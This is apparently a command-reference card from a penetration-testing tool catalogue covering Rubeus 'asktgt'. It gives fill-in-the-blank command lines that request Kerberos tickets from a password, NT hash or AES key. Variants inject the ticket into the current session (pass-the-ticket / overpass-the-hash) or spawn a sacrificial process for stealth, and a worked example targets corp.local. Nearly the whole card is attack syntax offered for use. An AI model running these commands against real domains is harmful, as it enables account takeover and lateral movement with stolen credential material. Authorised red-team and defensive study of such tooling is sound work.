Rubeus asktgt

Request a TGT for a user with a password, NT hash, or AES key. /ptt injects it into the current session; /createnetonly spawns a sacrificial process. The Rubeus equivalent of getTGT.py.

Tool
Rubeus.exe
Category
Credential Attacks / Kerberoasting
Platform
windows
Requires
NTLM hash
Protocols
KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

Rubeus.exe asktgt /user:<user> /rc4:<nt-hash> /domain:<domain> /nowrap

Credential variants

The same attack using a different authentication material.

Password Auth requires password

Rubeus.exe asktgt /user:<user> /password:<password> /domain:<domain> /nowrap

AES256 requires AES key

Rubeus.exe asktgt /user:<user> /aes256:<aes-key> /domain:<domain> /nowrap

Inject Ticket requires NTLM hash

Rubeus.exe asktgt /user:<user> /rc4:<nt-hash> /domain:<domain> /ptt

OPSEC Sacrificial Process requires NTLM hash

Rubeus.exe asktgt /user:<user> /rc4:<nt-hash> /domain:<domain> /createnetonly:C:\Windows\System32\cmd.exe

Examples

Rubeus.exe asktgt /user:jdoe /rc4:abcd1234... /domain:corp.local /ptt

Tags

rubeus asktgt tgt overpass-the-hash